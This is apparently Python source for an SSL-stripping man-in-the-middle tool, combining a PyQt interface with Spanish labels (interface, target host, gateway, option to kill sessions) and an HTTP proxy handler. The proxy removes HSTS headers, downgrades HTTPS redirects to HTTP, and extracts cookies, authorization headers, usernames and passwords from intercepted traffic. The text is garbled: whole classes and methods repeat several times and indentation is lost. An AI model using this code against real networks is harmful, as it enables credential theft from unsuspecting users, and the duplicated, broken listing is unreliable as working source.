def iniciarSSLStrip(self):
interfaz = str(self.ventana.boxInterface.currentText())
rhost = str(self.ventana.boxRHost.currentText())
gateway = str(self.ventana.boxGateway.currentText())
if self.ventana.checkMatarSesionesActivas.isChecked():
matarSesiones = True
else:
matarSesiones = False
self.ventana.visor.clear()
if interfaz != "" and rhost != "" and gateway != "":
self.ventana.botonIniciar.setDisabled(True)
self.ventana.botonParar.setEnabled(True)
self.threadSSLStrip = QtCore.QThread()
self.sslstrip = SSLStrip(interfaz, rhost, gateway, matarSesiones)
self.sslstrip.moveToThread(self.threadSSLStrip)
self.sslstrip.fin.connect(self.threadSSLStrip.quit)
self.sslstrip.texto.connect(self.imprimeProceso)
self.threadSSLStrip.started.connect(self.sslstrip.setup)
self.threadSSLStrip.start()
else:
msjAdvertencia = QtGui.QMessageBox()
msjAdvertencia.setText("Indicar interfaz, host remoto y gateway!")
msjAdvertencia.setWindowTitle("Advertencia")
msjAdvertencia.setIcon(msjAdvertencia.Warning)
msjAdvertencia.setButtonText(0x00000400, "Aceptar")
msjAdvertencia.exec_()
def iniciarSSLStrip(self):
interfaz = str(self.ventana.boxInterface.currentText())
rhost = str(self.ventana.boxRHost.currentText())
gateway = str(self.ventana.boxGateway.currentText())
if self.ventana.checkMatarSesionesActivas.isChecked():
matarSesiones = True
else:
matarSesiones = False
self.ventana.visor.clear()
if interfaz != "" and rhost != "" and gateway != "":
self.ventana.botonIniciar.setDisabled(True)
self.ventana.botonParar.setEnabled(True)
self.threadSSLStrip = QtCore.QThread()
self.sslstrip = SSLStrip(interfaz, rhost, gateway, matarSesiones)
self.sslstrip.moveToThread(self.threadSSLStrip)
self.sslstrip.fin.connect(self.threadSSLStrip.quit)
self.sslstrip.texto.connect(self.imprimeProceso)
self.threadSSLStrip.started.connect(self.sslstrip.setup)
self.threadSSLStrip.start()
else:
msjAdvertencia = QtGui.QMessageBox()
msjAdvertencia.setText("Indicar interfaz, host remoto y gateway!")
msjAdvertencia.setWindowTitle("Advertencia")
msjAdvertencia.setIcon(msjAdvertencia.Warning)
msjAdvertencia.setButtonText(0x00000400, "Aceptar")
msjAdvertencia.exec_()
class UStrip(QtGui.QWidget):
def __init__(self):
QtGui.QWidget.__init__(self)
self.ventana = Ui_SSLStrip()
self.ventana.setupUi(self)
self.centrar()
self.connect(self.ventana.botonActualizar, QtCore.SIGNAL("clicked()"),
self.actualizaDatos)
self.connect(self.ventana.botonIniciar, QtCore.SIGNAL("clicked()"),
self.iniciarSSLStrip)
self.connect(self.ventana.botonParar, QtCore.SIGNAL("clicked()"),
self.pararSSLStrip)
def inicioCarga(self):
self.cargador = Cargador()
self.cargador.show()
def finCarga(self):
self.cargador.close()
def actualizaDatos(self):
self.borraDatosPrevios()
self.setEnabled(False)
self.inicioCarga()
# Actualizamos interfaces
self.threadActualizaInterfaces = QtCore.QThread()
self.interfaces = ID()
self.interfaces.moveToThread(self.threadActualizaInterfaces)
self.interfaces.fin.connect(self.threadActualizaInterfaces.quit)
self.interfaces.interfaces.connect(self.actualizaInterfaces)
self.threadActualizaInterfaces.started.connect(self.interfaces.setup)
self.threadActualizaInterfaces.start()
# Actualizamos hosts
self.threadActualizaHosts = QtCore.QThread()
self.hosts = HD()
self.hosts.moveToThread(self.threadActualizaHosts)
self.hosts.fin.connect(self.threadActualizaHosts.quit)
self.hosts.hosts.connect(self.actualizaHosts)
self.threadActualizaHosts.started.connect(self.hosts.setup)
self.threadActualizaHosts.start()
def borraDatosPrevios(self):
self.ventana.boxInterface.clear()
self.ventana.boxRHost.clear()
self.ventana.boxGateway.clear()
def actualizaInterfaces(self, interfaces):
for interfaz in interfaces:
self.ventana.boxInterface.addItem(interfaz)
self.ventana.boxInterface.setStyleSheet("color: rgb(0, 0, 0);")
def actualizaHosts(self, hosts):
for host in hosts:
self.ventana.boxRHost.addItem(host)
self.ventana.boxGateway.addItem(host)
self.ventana.boxRHost.setStyleSheet("color: rgb(0, 0, 0);")
self.ventana.boxGateway.setStyleSheet("color: rgb(0, 0, 0);")
self.finCarga()
self.setEnabled(True)
def iniciarSSLStrip(self):
interfaz = str(self.ventana.boxInterface.currentText())
rhost = str(self.ventana.boxRHost.currentText())
gateway = str(self.ventana.boxGateway.currentText())
if self.ventana.checkMatarSesionesActivas.isChecked():
matarSesiones = True
else:
matarSesiones = False
self.ventana.visor.clear()
if interfaz != "" and rhost != "" and gateway != "":
self.ventana.botonIniciar.setDisabled(True)
self.ventana.botonParar.setEnabled(True)
self.threadSSLStrip = QtCore.QThread()
self.sslstrip = SSLStrip(interfaz, rhost, gateway, matarSesiones)
self.sslstrip.moveToThread(self.threadSSLStrip)
self.sslstrip.fin.connect(self.threadSSLStrip.quit)
self.sslstrip.texto.connect(self.imprimeProceso)
self.threadSSLStrip.started.connect(self.sslstrip.setup)
self.threadSSLStrip.start()
else:
msjAdvertencia = QtGui.QMessageBox()
msjAdvertencia.setText("Indicar interfaz, host remoto y gateway!")
msjAdvertencia.setWindowTitle("Advertencia")
msjAdvertencia.setIcon(msjAdvertencia.Warning)
msjAdvertencia.setButtonText(0x00000400, "Aceptar")
msjAdvertencia.exec_()
def pararSSLStrip(self):
self.ventana.botonIniciar.setEnabled(True)
self.ventana.botonParar.setDisabled(True)
self.sslstrip.parar()
def imprimeProceso(self, texto):
self.ventana.visor.append(
QtGui.QApplication.translate("SSLStrip", texto, None,
QtGui.QApplication.UnicodeUTF8))
def centrar(self):
qr = self.frameGeometry()
cp = QtGui.QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.move(qr.topLeft())
def closeEvent(self, event):
try:
self.ventana.visor.clear()
self.pararSSLStrip()
except:
pass
msjPregunta = QtGui.QMessageBox()
msjPregunta.setText("Realmente deseas salir")
msjPregunta.setWindowTitle("Mensaje")
msjPregunta.setIcon(msjPregunta.Question)
msjPregunta.setStandardButtons(QtGui.QMessageBox.Yes
| QtGui.QMessageBox.No)
msjPregunta.setButtonText(0x00004000, "Si")
respuesta = msjPregunta.exec_()
if respuesta == QtGui.QMessageBox.Yes:
event.accept()
else:
event.ignore()
def __init__(self, *args, **kwargs):
self.tls = threading.local()
self.tls.socket = {}
self.timeout = 5
self.SSLStrip = SSLStrip()
BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
class ProxyRequestHandler(BaseHTTPRequestHandler):
lock = threading.Lock()
def __init__(self, *args, **kwargs):
self.tls = threading.local()
self.tls.socket = {}
self.timeout = 5
self.SSLStrip = SSLStrip()
BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
@staticmethod
def get_credentials(headers, body):
if headers:
cookie_pattern = ['Cookie:', 'cookie:']
credentials_patern = [
'Authorization:', 'authorization:', 'WWW-Authenticate',
'www-authenticate', 'Proxy-Authorization', 'Proxy-Authenticate'
]
for h in headers:
for pattern in cookie_pattern:
if re.search(pattern, headers[h]):
print("\033[91mFOUND COOKIE: {}033[0m".format(
headers[h]))
for i in credentials_patern:
if re.search(i, headers[h]):
print("\033[91mFOUND CREDENTIALS: {}033[0m".format(
headers[h]))
if body:
user_regex = '([Uu]ser|[Ll]ogin|[Uu]sername|[Ii][Dd]|[Ee]mail|[Nn]ame)=([^&|;]*)'
password_regex = '([Pp]assword|[Pp]ass|[Pp]wd|[Pp]asswd|[Pp]asswrd)=([^&|;]*)'
raw = str(body.replace("\n", " "))
users = re.findall(user_regex, raw)
passwords = re.findall(password_regex, raw)
if users:
print("\033[91mFOUND USER: {}033[0m".format(str(users[0][1])))
if passwords:
print("\033[91mFOUND USER: {}033[0m".format(
str(passwords[0][1])))
def do_GET(self):
req = self
content_length = int(req.headers.get('Content-Length', 0))
req_body = self.rfile.read(content_length) if content_length else None
self.get_credentials(req.headers, req_body)
self.SSLStrip.request_handler(req, self.connection)
url = urlparse.urlsplit(req.path)
path = (url.path + '?' + url.query if url.query else url.path)
assert url.scheme in ('http', 'https')
print(
"HTTP from: {} \033[94m\033[1m{}\033[0m\033[94m {}\033[0m".format(
req.client_address[0][7::], req.command, path))
req.headers['Host'] = url.netloc
prefixes = ["wwww", "wintra"]
for prefix in prefixes:
if url.netloc.startswith(prefix):
url = url._replace(scheme="https", netloc=url.netloc[1:])
setattr(req, 'headers', self.clean_headers(req.headers))
origin = (url.scheme, url.netloc)
try:
if not origin in self.tls.socket:
if url.scheme == 'https':
self.tls.socket[origin] = httplib.HTTPSConnection(
url.netloc, timeout=self.timeout)
else:
self.tls.socket[origin] = httplib.HTTPConnection(
url.netloc, timeout=self.timeout)
connexion = self.tls.socket[origin]
print(" request \033[94m{}\033[0m {} {} len:{}".format(
self.command, url.netloc, path[0:30], len(str(req_body))))
connexion.request(self.command, path, req_body, dict(req.headers))
res = connexion.getresponse()
print(" response: {} {}".format(res.status, res.reason))
version_table = {10: 'HTTP/1.0', 11: 'HTTP/1.1'}
setattr(res, 'headers', res.msg)
setattr(res, 'response_version', version_table[res.version])
res_body = res.read()
except Exception as e:
print("Exception M---> {}".format(e))
if origin in self.tls.socket:
del self.tls.socket[origin]
self.send_error(503)
return
res_body_modified = self.SSLStrip.response_handler(
req, res, res_body, url, path)
if res_body_modified is not None:
res.headers['Content-Length'] = str(len(res_body_modified))
setattr(res, 'headers', self.clean_headers(res.headers))
print("HTTP to: {} \033[94m{}\033[0m {} @ {}".format(
req.client_address[0][7::], res.status, res.reason, self.path))
self.wfile.write("%s %d %s\r\n" %
(self.protocol_version, res.status, res.reason))
for line in res.headers.headers:
self.wfile.write(line)
self.end_headers()
self.wfile.write(res_body_modified)
self.wfile.flush()
do_HEAD = do_GET
do_POST = do_GET
def clean_headers(self, headers):
hop_by_hop = ('connection', 'keep-alive', 'proxy-authenticate',
'proxy-authorization', 'te', 'trailers',
'transfer-encoding', 'upgrade')
if 'Strict-Transport-Security' in headers:
del headers['Strict-Transport-Security']
if 'Location' in headers:
headers['Location'] = headers['Location'].replace(
"https://", "http://w")
for k in hop_by_hop:
del headers[k]
del headers['Accept-Encoding'] # mhhhhhhhhhHHH .........
return headers
class UStrip(QtGui.QWidget):
def __init__(self):
QtGui.QWidget.__init__(self)
self.ventana = Ui_SSLStrip()
self.ventana.setupUi(self)
self.centrar()
self.connect(self.ventana.botonActualizar, QtCore.SIGNAL("clicked()"),
self.actualizaDatos)
self.connect(self.ventana.botonIniciar, QtCore.SIGNAL("clicked()"),
self.iniciarSSLStrip)
self.connect(self.ventana.botonParar, QtCore.SIGNAL("clicked()"),
self.pararSSLStrip)
def inicioCarga(self):
self.cargador = Cargador()
self.cargador.show()
def finCarga(self):
self.cargador.close()
def actualizaDatos(self):
self.borraDatosPrevios()
self.setEnabled(False)
self.inicioCarga()
# Actualizamos interfaces
self.threadActualizaInterfaces = QtCore.QThread()
self.interfaces = ID()
self.interfaces.moveToThread(self.threadActualizaInterfaces)
self.interfaces.fin.connect(self.threadActualizaInterfaces.quit)
self.interfaces.interfaces.connect(self.actualizaInterfaces)
self.threadActualizaInterfaces.started.connect(self.interfaces.setup)
self.threadActualizaInterfaces.start()
# Actualizamos hosts
self.threadActualizaHosts = QtCore.QThread()
self.hosts = HD()
self.hosts.moveToThread(self.threadActualizaHosts)
self.hosts.fin.connect(self.threadActualizaHosts.quit)
self.hosts.hosts.connect(self.actualizaHosts)
self.threadActualizaHosts.started.connect(self.hosts.setup)
self.threadActualizaHosts.start()
def borraDatosPrevios(self):
self.ventana.boxInterface.clear()
self.ventana.boxRHost.clear()
self.ventana.boxGateway.clear()
def actualizaInterfaces(self, interfaces):
for interfaz in interfaces:
self.ventana.boxInterface.addItem(interfaz)
self.ventana.boxInterface.setStyleSheet("color: rgb(0, 0, 0);")
def actualizaHosts(self, hosts):
for host in hosts:
self.ventana.boxRHost.addItem(host)
self.ventana.boxGateway.addItem(host)
self.ventana.boxRHost.setStyleSheet("color: rgb(0, 0, 0);")
self.ventana.boxGateway.setStyleSheet("color: rgb(0, 0, 0);")
self.finCarga()
self.setEnabled(True)
def iniciarSSLStrip(self):
interfaz = str(self.ventana.boxInterface.currentText())
rhost = str(self.ventana.boxRHost.currentText())
gateway = str(self.ventana.boxGateway.currentText())
if self.ventana.checkMatarSesionesActivas.isChecked():
matarSesiones = True
else:
matarSesiones = False
self.ventana.visor.clear()
if interfaz != "" and rhost != "" and gateway != "":
self.ventana.botonIniciar.setDisabled(True)
self.ventana.botonParar.setEnabled(True)
self.threadSSLStrip = QtCore.QThread()
self.sslstrip = SSLStrip(interfaz, rhost, gateway, matarSesiones)
self.sslstrip.moveToThread(self.threadSSLStrip)
self.sslstrip.fin.connect(self.threadSSLStrip.quit)
self.sslstrip.texto.connect(self.imprimeProceso)
self.threadSSLStrip.started.connect(self.sslstrip.setup)
self.threadSSLStrip.start()
else:
msjAdvertencia = QtGui.QMessageBox()
msjAdvertencia.setText("Indicar interfaz, host remoto y gateway!")
msjAdvertencia.setWindowTitle("Advertencia")
msjAdvertencia.setIcon(msjAdvertencia.Warning)
msjAdvertencia.setButtonText(0x00000400, "Aceptar")
msjAdvertencia.exec_()
def pararSSLStrip(self):
self.ventana.botonIniciar.setEnabled(True)
self.ventana.botonParar.setDisabled(True)
self.sslstrip.parar()
def imprimeProceso(self, texto):
self.ventana.visor.append(QtGui.QApplication.translate("SSLStrip",
texto,
None,
QtGui.QApplication.UnicodeUTF8))
def centrar(self):
qr = self.frameGeometry()
cp = QtGui.QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.move(qr.topLeft())
def closeEvent(self, event):
try:
self.ventana.visor.clear()
self.pararSSLStrip()
except:
pass
msjPregunta = QtGui.QMessageBox()
msjPregunta.setText("Realmente deseas salir")
msjPregunta.setWindowTitle("Mensaje")
msjPregunta.setIcon(msjPregunta.Question)
msjPregunta.setStandardButtons(QtGui.QMessageBox.Yes | QtGui.QMessageBox.No)
msjPregunta.setButtonText(0x00004000, "Si")
respuesta = msjPregunta.exec_()
if respuesta == QtGui.QMessageBox.Yes:
event.accept()
else:
event.ignore()